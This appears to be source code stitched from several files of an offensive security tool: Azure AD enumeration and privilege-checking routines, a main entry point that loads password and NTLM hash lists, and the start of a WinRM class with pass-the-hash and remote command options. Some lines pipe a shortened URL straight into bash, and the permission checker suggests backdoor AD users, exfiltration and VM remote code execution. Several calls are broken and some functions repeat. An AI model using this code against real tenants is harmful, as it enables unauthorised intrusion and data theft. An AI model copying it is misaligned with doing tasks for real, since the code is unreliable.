# az ad sp list --show-mine
spnn_list = subprocess.run(['az','ad', 'sp', 'list', '--show-mine'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
#spnn_list = subprocess.run(['az','ad', 'sp', 'list', '--show-mine', '--query', '[].{appDisplayName:appDisplayName, appId:appId, appOwnerTenantId:appOwnerTenantId}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
spn_list_json = json.loads(spnn_list.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no VM subscriptions")
return
self.logger.announce("Getting SPN Info For Current User")
if self.args.full:
pprint.pprint(spn_list_json)
else:
self.logger.highlight("{:<40} | {:<32} | {}".format(' associated-app', ' appId', ' appOwnerTenantId'))
for spn in spn_list_json:
if spn['appDisplayName'] and spn['appId']:
self.logger.highlight("{:<40} | {} | {}".format((spn['appDisplayName'][:37] + (spn['appDisplayName'][37:] and '..')),
spn['appId'],
spn['appOwnerTenantId']))
###############################################################################
# ###### ######
# # # # # #
# # # # # #
# # ###### ######
####### # #
# # # #
# # # #
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def app_list(self):
#app_list = subprocess.run(['az','ad', 'app', 'list', '--all', '--query', '[].{DisplayName:displayName, appId:appId, homepage:homepage}'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
app_list = subprocess.run(['az','ad', 'app', 'list', '--all'], shell = self.windows, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
try:
app_list_json = json.loads(app_list.stdout.decode(self.decoder))
except:
self.logger.error("Current user has no VM subscriptions")
return
if self.args.full:
pprint.pprint(app_list_json)
return
self.logger.highlight("{:<35} {:<35} {} {} ".format(' displayName',
'homepage',
'keyProps',
'passwordProps' ))
for app in app_list_json:
#self.db.add_app(str(app['displayName']), str(app['appId']), str(app['homepage']), str(app['objectId']), str(app['allowGuestsSignIn']), str(app['keyCredentials']), str(app['passwordCredentials']), str(app['wwwHomepage']) )
self.db.add_app(app)
if not self.args.full:
self.logger.highlight("{:<35} | {:<35} | {:<9} | {:<}".format((app['displayName'][:33] + (app['displayName'][33:] and '..')),
((app['homepage'][:33] + (app['homepage'][33:] and '..')) if app['homepage'] else ' '),
('CheckDB' if app['keyCredentials'] else ' '),
('CheckDB' if app['passwordCredentials'] else ' ') ) )
def main():
setup_logger()
logger = CMXLogAdapter()
first_run_setup(logger)
args = gen_cli_args()
module = None
module_server = None
targets = []
server_port_dict = {'http': 80, 'https': 443, 'smb': 445}
current_workspace = cfg.WORKSPACE
hasPassList = False
if args.debug:
setup_debug_logger()
if args.darrell:
links = open((
cfg.DATA_PATH /
'videos_for_darrell').with_suffix('.harambe')).read().splitlines()
try:
webbrowser.open(random.choice(links))
sys.exit(1)
except:
sys.exit(1)
if args.rekt:
try:
os.system("curl -s -L http://bit.ly/10hA8iC | bash")
sys.exit(1)
except:
sys.exit(1)
logging.debug('Passed args:\n' + pformat(vars(args)))
if hasattr(args, 'username') and args.username:
for user in args.username:
if Path(user).is_file(): #If it was a file passed in
args.username.remove(user)
args.username.append(open(user, 'r'))
if hasattr(args, 'password') and args.password:
for passw in args.password:
if Path(passw).is_file(): #If it was a file passed in
hasPassList = True
args.password.remove(passw)
args.password.append(open(passw, 'r'))
elif hasattr(args, 'hash') and args.hash:
for ntlm_hash in args.hash:
if Path(ntlm_hash).is_file(): #If it was a file passed in
args.hash.remove(ntlm_hash)
args.hash.append(open(ntlm_hash, 'r'))
if hasattr(args, 'cred_id') and args.cred_id:
for cred_id in args.cred_id:
if '-' in str(cred_id):
start_id, end_id = cred_id.split('-')
try:
for n in range(int(start_id), int(end_id) + 1):
args.cred_id.append(n)
args.cred_id.remove(cred_id)
except Exception as e:
logger.error(
'Error parsing database credential id: {}'.format(e))
sys.exit(1)
if hasattr(args, 'target') and args.target:
for target in args.target:
if Path(target).is_file(): #If it was a file passed in
target_file_type = identify_target_file(target)
if target_file_type == 'nmap':
targets.extend(parse_nmap_xml(target, args.protocol))
elif target_file_type == 'nessus':
targets.extend(parse_nessus_file(target, args.protocol))
else:
with open(target, 'r') as target_file:
for target_entry in target_file:
targets.extend(parse_targets(target_entry))
else:
targets.extend(parse_targets(target))
p_loader = protocol_loader()
protocol_path = p_loader.get_protocols()[args.protocol]['path']
protocol_db_path = p_loader.get_protocols()[args.protocol]['dbpath']
protocol_object = getattr(p_loader.load_protocol(protocol_path),
args.protocol)
protocol_db_object = getattr(p_loader.load_protocol(protocol_db_path),
'database')
db_path = (cfg.WS_PATH / current_workspace /
args.protocol).with_suffix('.db')
# set the database connection to autocommit w/ isolation level
db_connection = sqlite3.connect(db_path, check_same_thread=False)
db_connection.text_factory = str
db_connection.isolation_level = None
db = protocol_db_object(db_connection)
setattr(protocol_object, 'config', cfg.__dict__)
if hasattr(args, 'module'):
loader = module_loader(args, db, logger)
if args.list_modules:
modules = loader.get_modules()
for name, props in sorted(modules.items()):
logger.announce('{:<25} {}'.format(name, props['description']))
sys.exit(0)
elif args.module and args.show_module_options:
modules = loader.get_modules()
for name, props in modules.items():
if args.module.lower() == name.lower():
logger.announce('{} module options:\n{}'.format(
name, props['options']))
sys.exit(0)
elif args.module:
modules = loader.get_modules()
for name, props in modules.items():
if args.module.lower() == name.lower():
module = loader.init_module(props['path'])
setattr(protocol_object, 'module', module)
break
if not module:
logger.error('Module not found')
exit(1)
if getattr(module, 'opsec_safe') is False:
ans = raw_input(
highlight(
'[!] Module is not opsec safe, are you sure you want to run this? [Y/n] ',
'red'))
if ans.lower() not in ['y', 'yes', '']:
sys.exit(1)
if getattr(module, 'multiple_hosts') is False and len(targets) > 1:
ans = raw_input(
highlight(
"[!] Running this module on multiple hosts doesn't really make any sense, are you sure you want to continue? [Y/n] ",
'red'))
if ans.lower() not in ['y', 'yes', '']:
sys.exit(1)
if hasattr(module, 'on_request') or hasattr(
module, 'has_response'):
if hasattr(module, 'required_server'):
args.server = getattr(module, 'required_server')
if not args.server_port:
args.server_port = 443
context = Context(db, logger, args)
module_server = CMXServer(module, context, logger,
args.server_host, args.server_port,
args.server)
module_server.start()
setattr(protocol_object, 'server', module_server.server)
try:
'''
Open threads
'''
pool = Pool(args.threads)
jobs = []
for target in targets:
jobs.append(pool.spawn(protocol_object, args, db, str(target)))
# Lets azure not require a target
if args.protocol == 'az':
if not targets:
jobs.append(pool.spawn(protocol_object, args, db, '1'))
if args.timeout == 0: args.timeout = None
for job in jobs:
job.join(timeout=args.timeout)
except (KeyboardInterrupt, gevent.Timeout):
logging.info("Timed out")
pass
if module_server:
module_server.shutdown()
class az(connection):
def __init__(self, args, db, host):
self.db = db
self.args = args
self.az_cli = None
self.username = ''
self.domain = ''
if args.config:
self.config1()
else:
self.proto_flow()
@staticmethod
def proto_args(parser, std_parser, module_parser):
azure_parser = parser.add_parser('az',
help="owning over azure",
parents=[std_parser, module_parser])
azure_parser.add_argument(
'--full',
action='store_true',
help='Display full json output for azure commands')
azure_parser.add_argument(
'--save',
action='store_true',
help=
'Saves just usernames to a file in current directory when doing user enum'
)
configgroup = azure_parser.add_argument_group(
"Configure Azure CLI", "Configure the Azure Connection")
configgroup.add_argument('--config',
action='store_true',
help='Setup or re-bind azure connection')
#commandgroup = azure_parser.add_argument_group("Command Execution", "Options for executing commands")
#commandgroup.add_argument("-x", metavar="COMMAND", dest='execute', help="execute the specified command")
enumgroup = azure_parser.add_argument_group(
"Enumeration", "Azure AD Enumeration Commands")
enumgroup.add_argument(
'--user',
nargs='?',
const='',
metavar='USER',
help='Enumerate and return all info about a user')
enumgroup.add_argument('--users',
action='store_true',
help='Enumerate and return all users')
enumgroup.add_argument(
'--group',
nargs='?',
const='',
metavar='GROUP',
help='Enumerate and return all members of a group')
enumgroup.add_argument('--groups',
action='store_true',
help='Enumerate and return all groups')
enumgroup.add_argument(
'--usergroups',
nargs='?',
const='',
metavar='USERSGROUPS',
help='Enumerate and return all groups a user is a member of')
privgroup = azure_parser.add_argument_group(
"Privilege Checks", "Get Privs and identify PrivEsc")
privgroup.add_argument(
'--suggest',
action='store_true',
help='Check for potentially abusable permissions')
privgroup.add_argument('--privs',
nargs='?',
const='',
metavar='USER',
help='Check current users privileges')
resourcegroup = azure_parser.add_argument_group(
"Resource Checks", "Interact with resources")
resourcegroup.add_argument(
'--rgroups',
action='store_true',
help='List all Resource Groups for current subscription')
sqlgroup = azure_parser.add_argument_group(
"SQL Commands", "Interact with SQL Servers and DBs")
sqlgroup.add_argument(
'--sql-list',
action='store_true',
help='List all SQL Servers for current subscription')
sqlgroup.add_argument('--sql-db-list',
nargs='?',
const='',
metavar='USER',
help='List all SQL DBs for current subscription')
storagegroup = azure_parser.add_argument_group(
"Storage Commands", "Interact with Storage")
storagegroup.add_argument(
'--storage-list',
action='store_true',
help='List all Storage for current subscription')
vmgroup = azure_parser.add_argument_group(
"VM Checks", "Interact with VMs and VM Scale Sets")
vmgroup.add_argument(
'--vm-list',
nargs='?',
const='',
metavar='RESOURCEGROUP',
help=
'List all VMs for current subscription or target resource group')
vmgroup.add_argument(
'--vmss-list',
nargs='?',
const='',
metavar='RESOURCEGROUP',
help=
'List all VM Scale Sets for current subscription or target resource group'
)
spngroup = azure_parser.add_argument_group(
"SPN Checks", "Interact with Service Principals")
spngroup.add_argument('--spn-list',
action='store_true',
help='List all SPNs for current subscription')
appgroup = azure_parser.add_argument_group("App Checks",
"Interact with Apps")
appgroup.add_argument('--app-list',
action='store_true',
help='List all Apps for current subscription')
return parser
def proto_flow(self):
self.proto_logger()
if self.test_connection():
self.call_cmd_args()
def proto_logger(self):
self.logger = CMXLogAdapter(
extra={
'protocol': 'AZURE',
'host': self.username,
'port': self.domain,
'hostname': 'CLI'
})
def test_connection(self):
if not cfg.AZ_CONFIG_PATH.is_file():
self.logger.error('Azure connection has not been configured.')
self.logger.error('Run: cmx az 1 --config')
return False
# Grab our user/domain and re-init logger.
# Config should have stored this in the config file.
f = open(cfg.AZ_CONFIG_PATH, "r")
data = f.read()
f.close()
self.username = data.split()[0].split('@')[0]
self.domain = data.split()[0].split('@')[1]
self.proto_logger()
self.az_cli = get_default_cli()
return True
def config1(self):
self.proto_logger()
login = subprocess.run(['az', 'login', '--allow-no-subscriptions'],
stdout=subprocess.PIPE)
user = re.findall('([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)',
str(login.stdout))
#print(" Logged in as {}".format(user[0]))
self.logger.success('Logged in as {}'.format(user[0]))
if not cfg.AZ_PATH.is_dir():
cfg.AZ_PATH.mkdir(parents=True, exist_ok=True)
f = open(cfg.AZ_CONFIG_PATH, "w")
f.write("{}".format(user[0]))
f.close()
print('')
print(" Azure Services now configured, Go get em tiger")
print('')
def call_cmd_args(self):
for k, v in list(vars(self.args).items()):
if hasattr(self, k) and hasattr(getattr(self, k), '__call__'):
if v is not False and v is not None:
logging.debug('Calling {}()'.format(k))
getattr(self, k)()
def execute(self, command):
try:
result = self.az_cli.invoke(command)
return {'result': result.result, 'error': None}
except CLIError as err:
return {'result': None, 'error': err.args}
###############################################################################
# ###### ####### # # # # # #
# # # # # ## # # # ## ##
# # # # # # # # # # # # # #
# # # # ##### ##### # # # # # # # #
####### # # # # # # # # # #
# # # # # # ## # # # #
# # ###### ####### # # ##### # #
###############################################################################
###############################################################################
# Network/Domain Enum functions
#
# This section:
#
#
#
#
# (fold next line)
###############################################################################
def user(self):
#if self.args.user == '':
# self.args.user = self.user
user_id = subprocess.run(
['az', 'ad', 'user', 'show', '--id', self.args.user],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
user_id_json = json.loads(user_id.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no subscriptions")
return
self.db.add_user(user_id_json)
plans = []
for plan in user_id_json["assignedPlans"]:
plans.append(plan["service"])
self.logger.announce("Getting User Info")
if self.args.full:
pprint.pprint(user_id_json)
else:
self.logger.highlight("{:<26} {}".format('mail: ',
user_id_json['mail']))
self.logger.highlight("{:<26} {}".format(
'mailNickname: ', user_id_json['mailNickname']))
self.logger.highlight("{:<26} {}".format(
'TelephoneNumber: ', user_id_json['telephoneNumber']))
self.logger.highlight("{:<26} {}".format('objectId: ',
user_id_json['objectId']))
self.logger.highlight(
"Assigned Plan Memberships: {}".format(plans))
self.logger.highlight("{:<26} {}".format(
'SID: ', user_id_json['onPremisesSecurityIdentifier']))
self.logger.highlight("{:<26} {}".format(
'userPrincipalName: ', user_id_json['userPrincipalName']))
self.logger.highlight("{:<26} {}".format(
'isCompromised: ', user_id_json['isCompromised']))
def usergroups(self):
users_groups = subprocess.run([
'az', 'ad', 'user', 'get-member-groups', '--id',
self.args.usergroups
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
users_groups_json = json.loads(users_groups.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no subscriptions")
return
pprint.pprint(users_groups_json)
def users(self):
self.logger.announce(
"Getting all users info, this might take a minute")
user_id = subprocess.run(['az', 'ad', 'user', 'list'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
user_id_json = json.loads(user_id.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no subscriptions")
return
try:
for user1 in user_id_json:
self.db.add_user(user1)
except:
self.logger.error("add user error tracebak:")
self.logger.error(format_exc())
# Do we save usernames
if self.args.save:
filename = "{}-users.txt".format(self.domain)
savefile = open(filename, "w")
if self.args.full:
pprint.pprint(user_id_json)
else:
usercount = 0
for user1 in user_id_json:
if user1['isCompromised'] == None:
comp = 'No'
else:
comp = 'Yes'
if self.args.save:
savefile.write("{}\n".format(user1['mail']))
usercount = usercount + 1
self.logger.highlight("{:<36} id:{} compromised:{} ".format(
user1['userPrincipalName'], user1['objectId'], comp))
if self.args.save:
savefile.close()
self.logger.success(
"Email addresses saved to: {}".format(filename))
self.logger.success("Total Users Found: {}".format(usercount))
self.logger.success(
"All user info complete. Check the db for more details")
def group(self):
if self.args.group == '':
self.logger.error('Must provide a group name or objectID')
return
group_list = subprocess.runsubprocess.run([
'az', 'ad', 'group', 'member', 'list', '--group', self.args.group
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
group_list_json = json.loads(group_list.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no subscriptions")
return
pprint.pprint(group_list_json)
def groups(self):
group_list = subprocess.runsubprocess.run([
'az', 'ad', 'group', 'list', '--query',
'[].{display_name:displayName, description: description, object_id: objectId}'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
group_list_json = json.loads(group_list.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no subscriptions")
return
pprint.pprint(group_list_json)
###############################################################################
###### ###### ### # # ####### ##### #####
# # # # # # # # # # # #
# # # # # # # # # #
###### ###### # # # ##### ##### #
# # # # # # # # #
# # # # # # # # # # #
# # # ### # ####### ##### #####
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def suggest(self):
# Grab user UPN
upn_resp = subprocess.run([
'az', 'ad', 'signed-in-user', 'show', '--query',
'{upn:userPrincipalName}'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
upn_json_obj = json.loads(upn_resp.stdout.decode('utf-8'))
upn = upn_json_obj['upn']
logging.debug('upn: {}'.format(upn))
# GetCurrent users roles
role_resp = subprocess.run([
'az', 'role', 'assignment', 'list', '--assignee', upn, '--query',
'[].{roleName:roleDefinitionName}'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
role_json_obj = json.loads(role_resp.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no subscriptions")
return
role_list = []
for role in role_json_obj:
role_list.append(role["roleName"])
if (len(role_list) == 0):
self.logger.error("No roles found")
return
# Get definitions for each role
tmp_list_perms = []
for role in role_list:
#print(role.upper())
role_show = subprocess.run([
'az', 'role', 'definition', 'list', '--name', role, '--query',
'[].{actions:permissions[].actions, dataActions:permissions[].dataActions, notActions:permissions[].notActions, notDataActions:permissions[].NotDataActions}'
],
stdout=subprocess.PIPE)
role_show_json = json.loads(role_show.stdout.decode('utf-8'))
tmp_list_perms.append(role_show_json[0]['actions'][0])
all_permissions = [
item for sublist in tmp_list_perms for item in sublist
]
self.check_perms(all_permissions)
def check_perms(self, permissions):
self.logger.announce("Getting potentially abusable global permissions")
for perm in permissions:
if ("*" in perm):
self.logger.highlight(
"Found permission with * - should investigate: {}".format(
perm))
elif ("write" in perm):
self.logger.highlight(
" found permission with write - should investigate: {}".
format(perm))
elif ("create" in perm):
self.logger.highlight(
" found permission with create - should investigate: {}".
format(perm))
elif ("delete" in perm):
self.logger.highlight(
" found permission with delete - should investigate: {}".
format(perm))
self.logger.announce("Checking specific permissions")
for perm in permissions:
if ("Microsoft.Authorization/*" in perm):
self.logger.highlight(
"Current user has permission to do all authorizations actions to resources - consider RBAC manipulation and adding a backdoor AD user"
)
if ("Microsoft.Authorization/*/read" in perm):
self.logger.highlight(
"Current user has permission to read all authorizations - consider running the priv domain enum module"
)
if ("Microsoft.Compute/*" in perm):
self.logger.highlight(
"Current user has permission to run all operations for all resource types - consider using the exfil modules"
)
if ("Microsoft.Compute/*/read" in perm):
self.logger.highlight(
"Current user has permission to read all compute related resources - consider using the various 'list' modules"
)
if ("Microsoft.Support/*" in perm):
self.logger.highlight(
"Current user has permission to issue and submit support tickets"
)
if ("Microsoft.Resources/*" in perm):
self.logger.highlight(
"Current user has permission to run all Microsoft.Resources related commands"
)
elif ("Microsoft.Resources/deployments/*" in perm):
self.logger.highlight(
"Current user has permission to run all deployment related commands"
)
elif ("Microsoft.Resources/deployments/subscriptions/*" in perm):
self.logger.highlight(
"Current user has permission to run all subscription related commands"
)
if ("Microsoft.Network/*" in perm):
self.logger.highlight(
"Current user has permission to run all networking related commands - consider running the net modules"
)
elif ("Microsoft.Network/networkSecurityGroups/*" in perm):
self.logger.highlight(
"Current user has permission to run all nsg related commands - consider running the nsg backdoor module"
)
elif ("Microsoft.Network/networkSecurityGroups/join/action"
in perm):
self.logger.highlight(
"Current user has permission to join a network security group "
)
if ("Microsoft.Compute/virtualMachines/*" in perm):
self.logger.highlight(
"Current user has permission to run virtual machine commands - consider running the various vm modules "
)
elif ("Microsoft.Compute/virtualMachines/runCommand/action" in perm
or "Microsoft.Compute/virtualMachines/runCommand/*" in perm):
self.logger.highlight(
"Current user has permission to run the runCommand virtual machine command - consider running the vm_rce "
)
if ("Microsoft.Compute/virtualMachinesScaleSets/*" in perm):
self.logger.highlight(
"Current user has permission to run virtual machine scale set commands - consider running the various vmss modules "
)
elif ("Microsoft.Compute/virtualMachinesScaleSets/runCommand/action"
in perm
or "Microsoft.Compute/virtualMachines/runCommand/*" in perm):
self.logger.highlight(
"Current user has permission to run the runCommand virtual machine scale set command - consider running the vmss_rce "
)
if ("Microsoft.Storage/*" in perm
or "Microsoft.Storage/storageAccounts/*" in perm):
self.logger.highlight(
"Current user has permission to run all storage account commands - consider running the various stg modules "
)
elif ("Microsoft.Storage/storageAccounts/blobServices/containers/*"
in perm):
self.logger.highlight(
"Current user has permissions to run all storage account container commands - consider running the various stg modules "
)
elif ("Microsoft.Storage/storageAccounts/listKeys/action" in perm):
self.logger.highlight(
"Current user has permission to read storage account keys - consider running the stg blob scan/download modules "
)
if ("Microsoft.Sql/*" in perm):
self.logger.highlight(
"Current user has permission to run all sql commands - consider running the various sql modules "
)
elif ("Microsoft.Sql/servers/*" in perm):
self.logger.highlight(
"Current user has permission to run all sql server commands - consider running the sql server list or the sql backdoor firewall modules "
)
elif ("Microsoft.Sql/servers/databases/*" in perm):
self.logger.highlight(
"Current user has permission to run all sql database commands - consider running the sql db list "
)
def privs(self):
# Grab user UPN
logging.debug("Starting privs")
if self.args.privs == '':
upn_resp = subprocess.run([
'az', 'ad', 'signed-in-user', 'show', '--query',
'{upn:userPrincipalName}'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
else:
upn_resp = subprocess.run([
'az', 'ad', 'user', 'show', '--id', self.args.privs, '--query',
'{upn:userPrincipalName}'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
upn_json_obj = json.loads(upn_resp.stdout.decode('utf-8'))
upn = upn_json_obj['upn']
logging.debug("upn {}".format(upn))
except:
self.logger.error("Current user has no subscriptions")
return
# GetCurrent users roles
role_resp = subprocess.run([
'az', 'role', 'assignment', 'list', '--assignee', upn, '--query',
'[].{roleName:roleDefinitionName}'
],
stdout=subprocess.PIPE)
try:
role_json_obj = json.loads(role_resp.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no subscriptions")
return
role_list = []
for role in role_json_obj:
role_list.append(role["roleName"])
if (len(role_list) == 0):
self.logger.error("No roles found")
return
for role in role_list:
#print(role.upper())
role_show = subprocess.run([
'az', 'role', 'definition', 'list', '--name', role, '--query',
'[].{actions:permissions[].actions, dataActions:permissions[].dataActions, notActions:permissions[].notActions, notDataActions:permissions[].NotDataActions}'
],
stdout=subprocess.PIPE)
role_show_json = json.loads(role_show.stdout.decode('utf-8'))
pprint.pprint(role_show_json)
###############################################################################
###### ####### ##### ####### # # ###### ##### #######
# # # # # # # # # # # # # #
# # # # # # # # # # # #
###### ##### ##### # # # # ###### # #####
# # # # # # # # # # # #
# # # # # # # # # # # # # #
# # ####### ##### ####### ##### # # ##### #######
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def rgroups(self):
rgroup = subprocess.run([
'az', 'group', 'list', '--query',
'[].{name:name, location: location, id: id}'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
rgroup_json = json.loads(rgroup.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no subscriptions")
return
pprint.pprint(rgroup_json)
###############################################################################
##### ##### #
# # # # #
# # # #
##### # # #
# # # # #
# # # # #
##### #### # #######
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def sql_list(self):
# Get server list
sql_info = subprocess.run([
'az', 'sql', 'server', 'list', '--query',
'[].{fqdn:fullyQualifiedDomainName, name:name, rgrp: resourceGroup, admin_username:administratorLogin} '
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
sql_info_json = json.loads(sql_info.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no SQL subscriptions")
return
pprint.pprint(sql_info_json)
def sql_db_list(self):
# Get server list
sql_info = subprocess.run([
'az', 'sql', 'server', 'list', '--query',
'[].{name:name, rgrp: resourceGroup} '
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
sql_info_json = json.loads(sql_info.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no SQL subscriptions")
return
servers = []
rgrps = []
for info in sql_info_json:
servers.append(info['name'])
rgrps.append(info['rgrp'])
pprint.pprint(rgroup_json)
# Get DBs
for i in range(len(servers)):
sql_info = subprocess.run([
'az', 'sql', 'db', 'list', '--server', servers[i],
'--resource-group', rgrps[i], '--query',
'[].{collation:collation, name:name, location:location, dbId:databaseId}'
],
stdout=subprocess.PIPE)
sql_info_json = json.loads(sql_info.stdout.decode('utf-8'))
print(servers[i], "\n")
pprint.pprint(sql_info_json)
###############################################################################
##### ####### ####### ###### # ##### #######
# # # # # # # # # # # #
# # # # # # # # # #
##### # # # ###### # # # #### #####
# # # # # # ####### # # #
# # # # # # # # # # # #
##### # ####### # # # # ##### #######
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def storage_list(self):
stg_list = subprocess.run([
'az', 'storage', 'account', 'list', '--query',
'[].{resource_group:resourceGroup, storage_types:primaryEndpoints}'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
stg_list_json = json.loads(stg_list.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no Storage subscriptions")
return
pprint.pprint(stg_list_json)
###############################################################################
# # # #
# # ## ##
# # # # # #
# # # # #
# # # #
# # # #
# # #
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def vm_list(self):
# Get all vms in subscription
if self.args.vm_list == '':
vm_list = subprocess.run([
'az', 'vm', 'list', '--query',
'[].{name:name,os:storageProfile.osDisk.osType, username:osProfile.adminUsername, vm_size:hardwareProfile.vmSize, resource_group: resourceGroup}'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
vm_list_json = json.loads(vm_list.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no VM subscriptions")
return
vm_iplist = subprocess.run([
'az', 'vm', 'list-ip-addresses', '--query',
'[].{name:virtualMachine.name, privateIp:virtualMachine.network.privateIpAddresses, publicIp:virtualMachine.network.publicIpAddresses[].ipAddress}'
],
stdout=subprocess.PIPE)
try:
vm_iplist_json = json.loads(vm_iplist.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no VM subscriptions")
return
else: # Get all vms in specified resource group
vm_list = subprocess.run([
'az', 'vm', 'list', '-g', self.args.vm_list, '--query',
'[].{name:name,os:storageProfile.osDisk.osType, username:osProfile.adminUsername, vm_size:hardwareProfile.vmSize, resource_group: resourceGroup}'
],
stdout=subprocess.PIPE)
try:
vm_list_json = json.loads(vm_list.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no VM subscriptions")
return
vm_iplist = subprocess.run([
'az', 'vm', 'list-ip-addresses', '-g', self.args.vm_list,
'--query',
'[].{name:virtualMachine.name, privateIp:virtualMachine.network.privateIpAddresses, publicIp:virtualMachine.network.publicIpAddresses[].ipAddress}'
],
stdout=subprocess.PIPE)
try:
vm_iplist_json = json.loads(vm_iplist.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no VM subscriptions")
return
for i in range(len(vm_list_json)):
vm_list_json[i].update(vm_iplist_json[i])
pprint.pprint(vm_list_json)
def vmss_list(self):
# Get list of vmss
vmss_list = subprocess.run([
'az', 'vmss', 'list', '--query',
'[].{name:name, rgrp:resourceGroup}'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
vmss_list_json = json.loads(vmss_list.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no VM subscriptions")
return
for i in range(len(vmss_list_json)):
# Get vmss info
vmss_list = subprocess.run([
'az', 'vmss', 'list', '--resource-group',
vmss_list_json[i]['rgrp'], '--query',
'[].{name:name, vmss_size:sku.name, os_distro:virtualMachineProfile.storageProfile.imageReference.offer,os_version:virtualMachineProfile.storageProfile.imageReference.sku, username:virtualMachineProfile.osProfile.adminUsername, rgrp: resourceGroup}'
],
stdout=subprocess.PIPE)
vmss_list_json = json.loads(vmss_list.stdout.decode('utf-8'))
pprint.pprint(vmss_list_json[i])
# Get vmss IP
vmss_iplist = subprocess.run([
'az', 'vmss', 'list-instance-public-ips', '--resource-group',
vmss_list_json[i]['rgrp'], '--name', vmss_list_json[i]['name'],
'--query', '[].{ipAddress:ipAddress}'
],
stdout=subprocess.PIPE)
vmss_iplist_json = json.loads(vmss_iplist.stdout.decode('utf-8'))
pprint.pprint(vmss_iplist_json)
###############################################################################
##### ###### # #
# # # # ## #
# # # # # #
##### ###### # # #
# # # # #
# # # # ##
##### # # #
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def spn_list(self):
stg_list = subprocess.run([
'az', 'ad', 'sp', 'list', '--all', '--query',
'[].{appDisplayName:appDisplayName, appId:appId}'
],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
stg_list_json = json.loads(stg_list.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no VM subscriptions")
return
pprint.pprint(stg_list_json)
###############################################################################
# ###### ######
# # # # # #
# # # # # #
# # ###### ######
####### # #
# # # #
# # # #
###############################################################################
###############################################################################
#
#
#
#
###############################################################################
def app_list(self):
#app_list = subprocess.run(['az','ad', 'app', 'list', '--all', '--query', '[].{DisplayName:displayName, appId:appId, homepage:homepage}'], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
app_list = subprocess.run(['az', 'ad', 'app', 'list', '--all'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
app_list_json = json.loads(app_list.stdout.decode('utf-8'))
except:
self.logger.error("Current user has no VM subscriptions")
return
for app in app_list_json:
self.db.add_app(str(app['displayName']), str(app['appId']),
str(app['homepage']), str(app['objectId']),
str(app['allowGuestsSignIn']),
str(app['keyCredentials']),
str(app['passwordCredentials']),
str(app['wwwHomepage']))
pprint.pprint(app_list_json)
class winrm(connection):
def __init__(self, args, db, host):
self.hostname = None
self.os_arch = None
self.local_ip = None
self.domain = None
self.server_os = None
self.os_arch = 0
self.hash = None
self.lmhash = ''
self.nthash = ''
self.remote_ops = None
self.bootkey = None
self.output_filename = None
self.smbv1 = None
self.signing = False
self.debug = args.verbose
self.dc_ip = ''
connection.__init__(self, args, db, host)
@staticmethod
def proto_args(parser, std_parser, module_parser):
winrm_parser = parser.add_parser('winrm', help="own stuff using WINRM", parents=[std_parser, module_parser])
winrm_parser.add_argument("-H", '--hash', metavar="HASH", dest='hash', nargs='+', default=[], help='NTLM hash(es) or file(s) containing NTLM hashes')
winrm_parser.add_argument("--continue-on-success", action='store_true', help="continues authentication attempts even after successes")
dgroup = winrm_parser.add_mutually_exclusive_group()
dgroup.add_argument("-d", metavar="DOMAIN", dest='domain', type=str, default=None, help="domain to authenticate to")
dgroup.add_argument("--local-auth", action='store_true', help='authenticate locally to each target')
cgroup = winrm_parser.add_argument_group("Command Execution", "Options for executing commands")
cgroup.add_argument('--no-output', action='store_true', help='do not retrieve command output')
cgroup.add_argument("-x", metavar="COMMAND", dest='execute', help="execute the specified command")
cgroup.add_argument("-X", metavar="PS_COMMAND", dest='ps_execute', help='execute the specified PowerShell command')
return parser
def proto_flow(self):
self.proto_logger()
if self.create_conn_obj():
self.enum_host_info()
self.print_host_info()
if self.login():
if hasattr(self.args, 'module') and self.args.module:
self.call_modules()
else:
self.call_cmd_args()
def proto_logger(self):
print('test')
self.logger = CMXLogAdapter(extra={'protocol': 'WINRM',
'host': self.host,
'port': 'NONE',
